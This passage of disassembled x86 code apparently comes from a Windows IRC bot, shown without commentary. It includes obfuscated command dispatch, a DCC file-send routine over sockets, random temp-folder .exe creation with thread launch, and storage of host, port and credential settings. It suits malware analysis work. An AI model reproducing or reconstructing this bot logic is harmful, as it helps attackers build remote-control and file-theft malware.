jz short loc_40FB35
mov ebx, offset aSOpenedS_ ; "%s Opened: \"%s\"."
loc_40FAFD: ; CODE XREF: sub_40A9FE+4C17�j
; sub_40A9FE+4C45�j ...
cmp [ebp+arg_14], 0
jnz short loc_40FB20
cmp [ebp+arg_18], 0
jnz short loc_40FB2A
lea eax, [ebp+var_418]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40FB20: ; CODE XREF: sub_40A9FE+5103�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40FB2A: ; CODE XREF: sub_40A9FE+5109�j
lea eax, [ebp+var_418]
jmp loc_40B0F9
; ---------------------------------------------------------------------------
loc_40FB35: ; CODE XREF: sub_40A9FE+50F8�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
jnz short loc_40FB65
cmp [ebp+arg_18], 0
jnz short loc_40FB6F
call ebx ; dword_437170
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToOpenS ; "%s Failed to open: \"%s\",error: <%d>"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40FB65: ; CODE XREF: sub_40A9FE+5141�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40FB6F: ; CODE XREF: sub_40A9FE+5147�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToOpenS ; "%s Failed to open: \"%s\",error: <%d>"
jmp loc_41491D
; ---------------------------------------------------------------------------
loc_40FB84: ; CODE XREF: sub_40A9FE+49A1�j
; sub_40A9FE+49AC�j
cmp [ebp+arg_14], ecx
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jnz loc_40D2BD
cmp [ebp+arg_18], ecx
jmp loc_40D2AB
; ---------------------------------------------------------------------------
loc_40FB9F: ; CODE XREF: sub_40A9FE+4996�j
push dword ptr [ebx]
push offset aHpmch0pbq800 ; "HPmCH0PbQ800"
call edi ; dword_437178
test eax, eax
jnz loc_40FF90
xor edi, edi
cmp [ebx+4], edi
jnz short loc_40FBF3
cmp [ebp+arg_14], edi
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40FBDF
cmp [ebp+arg_18], edi
jnz short loc_40FBE8
push ebx
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40FBDF: ; CODE XREF: sub_40A9FE+51C1�j
cmp [ebp+arg_18], edi
jz loc_414995
loc_40FBE8: ; CODE XREF: sub_40A9FE+51C6�j
push ebx
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
jmp loc_41478C
; ---------------------------------------------------------------------------
loc_40FBF3: ; CODE XREF: sub_40A9FE+51B7�j
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_14]
mov [ebp+var_21C0], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1F98], eax
cmp eax, edi
mov [ebp+var_1F94], ecx
lea eax, [ebp+var_21B8]
jnz short loc_40FC1D
push dword ptr [esi+0Ch]
jmp short loc_40FC1F
; ---------------------------------------------------------------------------
loc_40FC1D: ; CODE XREF: sub_40A9FE+5218�j
push dword ptr [esi]
loc_40FC1F: ; CODE XREF: sub_40A9FE+521D�j
push eax
call dword_4370B4 ; lstrcpyA
push 80h
lea eax, [ebp+var_2020]
push dword ptr [esi]
push eax
call sub_429D10
push dword ptr [ebx+4]
lea eax, [ebp+var_2124]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 18h
lea eax, [ebp+var_2124]
mov [ebp+var_48], edi
mov [ebp+arg_8], edi
push edi
push edi
push 3
push edi
push 1
push 80000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_68], eax
jnz short loc_40FC95
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_21B8]
push offset aSNoFile ; "%s No file"
push eax
push [ebp+arg_10]
call sub_41CE4A
jmp loc_40BA6A
; ---------------------------------------------------------------------------
loc_40FC95: ; CODE XREF: sub_40A9FE+5277�j
push edi
push [ebp+arg_68]
call dword_4370C0 ; GetFileSize
push edi
push 1
push 2
mov ebx, eax
call dword_4372BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_C], eax
jnz short loc_40FCE1
loc_40FCB4: ; CODE XREF: sub_40A9FE+537E�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSSD ; "%s %s <%d>"
loc_40FCCA: ; CODE XREF: sub_40A9FE+534E�j
lea eax, [ebp+var_21B8]
push eax
push [ebp+arg_10]
call sub_41CE4A
loc_40FCD9: ; CODE XREF: sub_40A9FE+68FA�j
add esp, 18h
jmp loc_412FED
; ---------------------------------------------------------------------------
loc_40FCE1: ; CODE XREF: sub_40A9FE+52B4�j
push 10h
lea eax, [ebp+var_90]
push edi
push eax
call sub_429760
mov esi, 400h
push 0FA00h
push esi
mov [ebp+var_90], 2
call sub_41E415
add esp, 14h
push eax
call dword_4372C4 ; ntohs
mov word ptr [ebp+var_8E], ax
lea eax, [ebp+var_90]
push 10h
push eax
push [ebp+arg_C]
mov [ebp+var_8E+2], edi
call dword_437298 ; bind
test eax, eax
jz short loc_40FD51
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSBindSD ; "%s Bind %s <%d>"
jmp loc_40FCCA
; ---------------------------------------------------------------------------
loc_40FD51: ; CODE XREF: sub_40A9FE+5336�j
push 10h
pop eax
mov [ebp+var_70], eax
mov [ebp+var_50], eax
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+arg_C]
call dword_43729C ; getsockname
push 1
push [ebp+arg_C]
call dword_4372A0 ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FCB4
push offset dword_457CF8
call dword_4372A4 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_44]
push eax
call sub_429420
lea eax, [ebp+var_2124]
push eax
lea eax, [ebp+var_2020]
push offset aSendingYouS ; "Sending you %s"
push eax
push [ebp+arg_10]
call sub_41CDD4
lea eax, [ebp+var_2124]
push offset dword_457CF8
push eax
lea eax, [ebp+var_2020]
push offset aDccSendSS ; "DCC Send %s (%s)"
push eax
push [ebp+arg_10]
call sub_41CDD4
add esp, 30h
push ebx
push [ebp+var_8E]
call dword_4372A8 ; ntohs
movzx eax, ax
push eax
push [ebp+var_44]
call dword_4372F0 ; ntohl
push eax
lea eax, [ebp+var_2124]
push eax
lea eax, [ebp+var_2020]
push offset aSDDI ; "%s %d %d %i"
push eax
push [ebp+arg_10]
call sub_41CEC0
mov eax, [ebp+arg_C]
add esp, 1Ch
mov [ebp+var_5BBC], eax
lea eax, [ebp+var_98]
push eax
push edi
lea eax, [ebp+var_5BC0]
push edi
push eax
push edi
mov [ebp+var_98], 2Dh
mov [ebp+var_94], edi
mov [ebp+var_5BC0], 1
call dword_4372B0 ; select
test eax, eax
jg short loc_40FE8D
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_21B8]
push offset aSTimedOutClosi ; "%s Timed Out, closing connection."
push eax
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
push [ebp+arg_68]
call dword_437044 ; CloseHandle
push [ebp+arg_C]
mov esi, dword_4372D8
call esi ; dword_4372D8
push edi
call esi ; dword_4372D8
jmp loc_412FED
; ---------------------------------------------------------------------------
loc_40FE8D: ; CODE XREF: sub_40A9FE+5455�j
lea eax, [ebp+var_70]
push eax
lea eax, [ebp+var_CF4]
push eax
push [ebp+arg_C]
call dword_4372B4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_40FF4B
push [ebp+arg_C]
call dword_4372D8 ; closesocket
mov [ebp+arg_4], ebx
loc_40FEB9: ; CODE XREF: sub_40A9FE+5547�j
push esi
lea eax, [ebp+var_7180]
push edi
push eax
mov [ebp+arg_64], esi
call sub_429760
add esp, 0Ch
cmp [ebp+arg_4], esi
jnb short loc_40FED8
mov eax, [ebp+arg_4]
mov [ebp+arg_64], eax
loc_40FED8: ; CODE XREF: sub_40A9FE+54D2�j
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_68]
call dword_4370BC ; SetFilePointer
lea eax, [ebp+var_48]
push edi
push eax
lea eax, [ebp+var_7180]
push [ebp+arg_64]
push eax
push [ebp+arg_68]
call dword_437084 ; ReadFile
push edi
lea eax, [ebp+var_7180]
push [ebp+arg_64]
push eax
push [ebp+var_4]
call dword_4372D0 ; send
mov [ebp+arg_64], eax
push edi
lea eax, [ebp+var_7180]
push esi
push eax
push [ebp+var_4]
call dword_4372D4 ; recv
mov ecx, [ebp+arg_8]
mov [ebp+arg_4], ebx
add ecx, [ebp+arg_64]
sub [ebp+arg_4], ecx
mov [ebp+arg_8], ecx
cmp [ebp+arg_4], 1
jb short loc_40FF4B
cmp [ebp+arg_64], 1
jb short loc_40FF4B
cmp eax, 1
jnb loc_40FEB9
loc_40FF4B: ; CODE XREF: sub_40A9FE+54A9�j
; sub_40A9FE+553C�j ...
mov eax, [ebp+arg_8]
cdq
idiv esi
shr ebx, 0Ah
push ebx
push eax
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_21B8]
push offset aSConnectionClo ; "%s Connection closed: (%i/%ikB sent)."
push eax
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
push [ebp+arg_68]
call dword_437044 ; CloseHandle
push [ebp+arg_C]
mov esi, dword_4372D8
call esi ; dword_4372D8
push [ebp+var_4]
call esi ; dword_4372D8
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40FF90: ; CODE XREF: sub_40A9FE+51AC�j
push dword ptr [ebx]
push offset aUfbss0cbo8c__0 ; "uFbSS0Cbo8C."
call edi ; dword_437178
test eax, eax
jnz loc_410189
cmp [ebx+4], eax
jz loc_41017F
cmp [ebx+8], eax
jz loc_41017F
push 11h
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_410006
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40FFEE
cmp [ebp+arg_18], 0
jnz short loc_40FFF8
push eax
push ebx
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40FFEE: ; CODE XREF: sub_40A9FE+55D2�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40FFF8: ; CODE XREF: sub_40A9FE+55D8�j
push [ebp+arg_C]
push ebx
loc_40FFFC: ; CODE XREF: sub_40A9FE+5715�j
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_410006: ; CODE XREF: sub_40A9FE+55C2�j
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_20]
mov [ebp+var_728], eax
mov eax, [ebp+arg_14]
mov [ebp+var_674], eax
mov eax, [ebp+arg_18]
mov [ebp+var_670], eax
mov [ebp+var_678], ecx
test eax, eax
lea eax, [ebp+var_724]
jnz short loc_410039
push dword ptr [esi+0Ch]
jmp short loc_41003B
; ---------------------------------------------------------------------------
loc_410039: ; CODE XREF: sub_40A9FE+5634�j
push dword ptr [esi]
loc_41003B: ; CODE XREF: sub_40A9FE+5639�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebx+4]
xor ecx, ecx
mov [ebp+var_6A0], eax
mov eax, [ebx+8]
mov [ebp+var_69C], eax
xor eax, eax
loc_410058: ; DATA XREF: .text:off_43BCBC�o
mov [ebp+var_694], eax
cmp [ebx+0Ch], eax
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
setnz cl
mov [ebp+var_690], ecx
xor ecx, ecx
cmp [ebx+10h], eax
setnz cl
mov [ebp+var_68C], ecx
push dword ptr [ebx+8]
mov eax, [ebx+4]
push eax
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push edi
push offset aSSS_ ; "%s %s %s."
push 11h
call sub_4234A7
add esp, 18h
mov [ebp+var_6A4], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_728]
push eax
xor eax, eax
push eax
push ecx
push offset sub_4182BA
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_6A4]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_410120
cmp [ebp+arg_14], eax
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410101
cmp [ebp+arg_18], eax
jnz short loc_41010B
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_410101: ; CODE XREF: sub_40A9FE+56E0�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41010B: ; CODE XREF: sub_40A9FE+56E5�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_40FFFC
; ---------------------------------------------------------------------------
loc_410118: ; CODE XREF: sub_40A9FE+5729�j
push 32h
call dword_437190 ; Sleep
loc_410120: ; CODE XREF: sub_40A9FE+56D0�j
cmp [ebp+var_66C], 0
jz short loc_410118
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_41015E
cmp [ebp+arg_18], eax
jnz short loc_410168
cmp [ebp+arg_20], eax
jz loc_414995
push dword ptr [ebx+8]
mov eax, [ebx+4]
push eax
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push edi
push offset aSSS_ ; "%s %s %s."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_41015E: ; CODE XREF: sub_40A9FE+5730�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_410168: ; CODE XREF: sub_40A9FE+5735�j
push dword ptr [ebx+8]
mov eax, [ebx+4]
push eax
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push edi
push offset aSSS_ ; "%s %s %s."
jmp loc_414988
; ---------------------------------------------------------------------------
loc_41017F: ; CODE XREF: sub_40A9FE+55A6�j
; sub_40A9FE+55AF�j
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_410189: ; CODE XREF: sub_40A9FE+559D�j
push dword ptr [ebx]
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
call edi ; dword_437178
test eax, eax
jnz loc_410418
xor ecx, ecx
cmp [ebx+4], ecx
jnz short loc_4101BC
cmp [ebp+arg_14], ecx
mov edi, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40BF3A
cmp [ebp+arg_18], ecx
jmp loc_40BF1F
; ---------------------------------------------------------------------------
loc_4101BC: ; CODE XREF: sub_40A9FE+57A1�j
mov eax, [ebx+8]
cmp eax, ecx
jz short loc_4101D3
push eax
push offset a3c9 ; "]&3c9"
call edi ; dword_437178
test eax, eax
jz loc_414995
loc_4101D3: ; CODE XREF: sub_40A9FE+57C3�j
push 11h
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_410226
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41020E
cmp [ebp+arg_18], 0
jnz short loc_410218
push eax
push ebx
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_41020E: ; CODE XREF: sub_40A9FE+57F2�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_410218: ; CODE XREF: sub_40A9FE+57F8�j
push [ebp+arg_C]
push ebx
loc_41021C: ; CODE XREF: sub_40A9FE+59A8�j
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_410226: ; CODE XREF: sub_40A9FE+57E2�j
lea eax, [ebp+var_6D80]
push eax
push 104h
call dword_4370B8 ; GetTempPathA
call sub_429B9C
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
idiv edi
lea eax, [ebp+var_6D80]
push edx
push offset dword_4439B4
push eax
lea eax, [ebp+var_5DC4]
push offset aSSDDDDD_exe ; "%s%s%d%d%d%d%d.exe"
push eax
call sub_429B03
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_20]
mov [ebp+var_664], eax
mov eax, [ebp+arg_14]
mov [ebp+var_5B0], eax
mov eax, [ebp+arg_18]
add esp, 24h
mov [ebp+var_5AC], eax
test eax, eax
mov [ebp+var_5B4], ecx
lea eax, [ebp+var_660]
jnz short loc_4102C3
push dword ptr [esi+0Ch]
jmp short loc_4102C5
; ---------------------------------------------------------------------------
loc_4102C3: ; CODE XREF: sub_40A9FE+58BE�j
push dword ptr [esi]
loc_4102C5: ; CODE XREF: sub_40A9FE+58C3�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebx+4]
xor ecx, ecx
mov [ebp+var_5DC], eax
lea eax, [ebp+var_5DC4]
mov [ebp+var_5D8], eax
xor eax, eax
cmp [ebx+0Ch], eax
mov [ebp+var_5D0], 1
mov [ebp+var_5CC], eax
mov [ebp+var_5C8], eax
setnz cl
mov [ebp+var_5C4], ecx
mov eax, [ebx+4]
lea ecx, [ebp+var_5DC4]
mov edi, offset aRy6iq0udbphN2n ; "RY6IQ0UDbPh/N2NHs/pc9zb/8Wb3v063Ds00"
push ecx
push eax
push edi
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push offset dword_441058
push 11h
call sub_4234A7
add esp, 18h
mov [ebp+var_5E0], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_664]
push eax
xor eax, eax
push eax
push ecx
push offset sub_4182BA
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_5E0]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_4103B3
cmp [ebp+arg_14], eax
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410394
cmp [ebp+arg_18], eax
jnz short loc_41039E
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_410394: ; CODE XREF: sub_40A9FE+5973�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41039E: ; CODE XREF: sub_40A9FE+5978�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_41021C
; ---------------------------------------------------------------------------
loc_4103AB: ; CODE XREF: sub_40A9FE+59BC�j
push 32h
call dword_437190 ; Sleep
loc_4103B3: ; CODE XREF: sub_40A9FE+5963�j
cmp [ebp+var_5A8], 0
jz short loc_4103AB
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_4103F4
cmp [ebp+arg_18], eax
jnz short loc_4103FE
cmp [ebp+arg_20], eax
jz loc_414995
push [ebp+var_5D8]
mov eax, [ebx+4]
push eax
push edi
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push offset dword_441058
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_4103F4: ; CODE XREF: sub_40A9FE+59C3�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4103FE: ; CODE XREF: sub_40A9FE+59C8�j
push [ebp+var_5D8]
mov ebx, [ebx+4]
push ebx
push edi
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push offset dword_441058
jmp loc_414988
; ---------------------------------------------------------------------------
loc_410418: ; CODE XREF: sub_40A9FE+5796�j
push dword ptr [ebx]
push offset aUqyil_iyvpi_ ; "uQYiL.iYvpI."
call edi ; dword_437178
test eax, eax
jnz loc_41060D
cmp [ebx+4], eax
jz loc_410603
cmp [ebx+8], eax
jz loc_410603
mov edi, 200h
push edi
push eax
push offset dword_4565A0
call sub_429760
push edi
push 0
push offset dword_4567A8
call sub_429760
push edi
push 0
push offset dword_4569A8
call sub_429760
push edi
push 0
push offset dword_456BA8
call sub_429760
mov edi, dword_4370B4
add esp, 30h
push dword ptr [ebx+4]
push offset dword_4565A0
call edi ; dword_4370B4
push dword ptr [ebx+8]
call sub_42A100
mov dword_4567A0, eax
mov eax, [ebx+0Ch]
test eax, eax
pop ecx
jz short loc_4104A3
push eax
push offset dword_4567A8
call edi ; dword_4370B4
loc_4104A3: ; CODE XREF: sub_40A9FE+5A9B�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_4104B2
push eax
push offset dword_4569A8
call edi ; dword_4370B4
loc_4104B2: ; CODE XREF: sub_40A9FE+5AAA�j
mov ebx, [ebx+14h]
test ebx, ebx
jz short loc_4104C1
push ebx
push offset dword_456BA8
call edi ; dword_4370B4
loc_4104C1: ; CODE XREF: sub_40A9FE+5AB9�j
cmp [ebp+arg_60], 0
jz loc_4105AF
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
push 1Ah
pop ebx
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429B9C
cdq
idiv ebx
mov ebx, offset dword_456218
add edx, 61h
push edx
push offset aCCCCCC ; "%c%c%c%c%c%c"
push ebx
call sub_429B03
add esp, 20h
push ebx
push offset dword_4567A8
call edi ; dword_4370B4
push ebx
push offset dword_4569A8
call edi ; dword_4370B4
call sub_429B9C
push 9
pop ebx
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429B9C
cdq
idiv ebx
lea eax, [ebp+var_61CC]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429B03
add esp, 20h
lea eax, [ebp+var_61CC]
push eax
push offset dword_456BA8
call edi ; dword_4370B4
loc_4105AF: ; CODE XREF: sub_40A9FE+5AC7�j
cmp [ebp+arg_14], 0
mov dword_456DA8, 1
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
mov ebx, offset aSIsSetToSDUSPS ; "%s is set to %s:%d U: %s P: %s F: %s"
jnz short loc_4105FD
cmp [ebp+arg_18], 0
jnz loc_41066F
push offset dword_456BA8
push offset dword_4569A8
push offset dword_4567A8
push dword_4567A0
push offset dword_4565A0
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 24h
loc_4105FD: ; CODE XREF: sub_40A9FE+5BC9�j
cmp [ebp+arg_18], 0
jmp short loc_410669
; ---------------------------------------------------------------------------
loc_410603: ; CODE XREF: sub_40A9FE+5A2E�j
; sub_40A9FE+5A37�j
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_41060D: ; CODE XREF: sub_40A9FE+5A25�j
push dword ptr [ebx]
push offset a4qyyh1q2ps1 ; "4QyYH1q/2ps1"
call edi ; dword_437178
test eax, eax
jnz loc_4106CE
cmp dword_456DA8, eax
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
jz short loc_41069D
cmp [ebp+arg_14], eax
mov ebx, offset aSIsSetToSDUSPS ; "%s is set to %s:%d U: %s P: %s F: %s"
jnz short loc_410666
cmp [ebp+arg_18], eax
jnz short loc_41066F
push offset dword_456BA8
push offset dword_4569A8
push offset dword_4567A8
push dword_4567A0
push offset dword_4565A0
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 24h
xor eax, eax
loc_410666: ; CODE XREF: sub_40A9FE+5C35�j
cmp [ebp+arg_18], eax
loc_410669: ; CODE XREF: sub_40A9FE+5C03�j
jz loc_412FED
loc_41066F: ; CODE XREF: sub_40A9FE+5BCF�j
; sub_40A9FE+5C3A�j
push offset dword_456BA8
push offset dword_4569A8
push offset dword_4567A8
push dword_4567A0
push offset dword_4565A0
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 24h
jmp loc_412FED
; ---------------------------------------------------------------------------
loc_41069D: ; CODE XREF: sub_40A9FE+5C2B�j
cmp [ebp+arg_14], eax
mov ebx, offset aSIsOff_ ; "%s is off."
jnz short loc_4106BE
cmp [ebp+arg_18], eax
jnz short loc_4106C7
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
xor eax, eax
loc_4106BE: ; CODE XREF: sub_40A9FE+5CA7�j
cmp [ebp+arg_18], eax
loc_4106C1: ; CODE XREF: sub_40A9FE+5D9F�j
jz loc_412FED
loc_4106C7: ; CODE XREF: sub_40A9FE+5CAC�j
; sub_40A9FE:loc_410783�j
push edi
push ebx
jmp loc_40BA60
; ---------------------------------------------------------------------------
loc_4106CE: ; CODE XREF: sub_40A9FE+5C1A�j
push dword ptr [ebx]
push offset aZgidu12tiv0 ; "ZGidU12tiV0/"
call edi ; dword_437178
test eax, eax
jnz short loc_410702
cmp dword_456DA8, eax
jz loc_412FED
mov ebx, offset aSIsOn_ ; "%s is on."
loc_4106EC: ; CODE XREF: sub_40A9FE+5D22�j
cmp [ebp+arg_14], eax
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
jnz loc_410799
cmp [ebp+arg_18], eax
jmp loc_410783
; ---------------------------------------------------------------------------
loc_410702: ; CODE XREF: sub_40A9FE+5CDB�j
push dword ptr [ebx]
push offset aHgcrw_cwuf5_ ; "HGCRW.CWUF5."
call edi ; dword_437178
test eax, eax
jnz short loc_410722
cmp dword_456DA8, eax
jnz loc_412FED
mov ebx, offset aSIsOff_ ; "%s is off."
jmp short loc_4106EC
; ---------------------------------------------------------------------------
loc_410722: ; CODE XREF: sub_40A9FE+5D0F�j
push dword ptr [ebx]
push offset aGztle_nhywf ; "gzTlE.nhywf/"
call edi ; dword_437178
test eax, eax
jnz short loc_4107A2
mov edi, 200h
xor ebx, ebx
push edi
push ebx
push offset dword_4565A0
mov dword_456DA8, ebx
call sub_429760
push edi
push ebx
push offset dword_4567A8
call sub_429760
push edi
push ebx
push offset dword_4569A8
call sub_429760
push edi
push ebx
push offset dword_456BA8
call sub_429760
add esp, 30h
cmp [ebp+arg_14], 0
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
mov ebx, offset aSIsOff_ ; "%s is off."
jnz short loc_410799
cmp [ebp+arg_18], 0
loc_410783: ; CODE XREF: sub_40A9FE+5CFF�j
jnz loc_4106C7
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_410799: ; CODE XREF: sub_40A9FE+5CF6�j
; sub_40A9FE+5D7F�j
cmp [ebp+arg_18], 0
jmp loc_4106C1
; ---------------------------------------------------------------------------
loc_4107A2: ; CODE XREF: sub_40A9FE+5D2F�j
push dword ptr [ebx]
push offset aL80reUvcue1 ; "l80re/UvCUe1"
call edi ; dword_437178
test eax, eax
jnz short loc_4107F6
cmp [ebp+arg_18], eax
mov ebx, [ebx+4]
jnz short loc_4107D1
test ebx, ebx
jz short loc_4107C4
push ebx
call sub_42A100
pop ecx
jmp short loc_4107C6
; ---------------------------------------------------------------------------
loc_4107C4: ; CODE XREF: sub_40A9FE+5DBB�j
xor eax, eax
loc_4107C6: ; CODE XREF: sub_40A9FE+5DC4�j
push eax
push [ebp+arg_20]
push 0
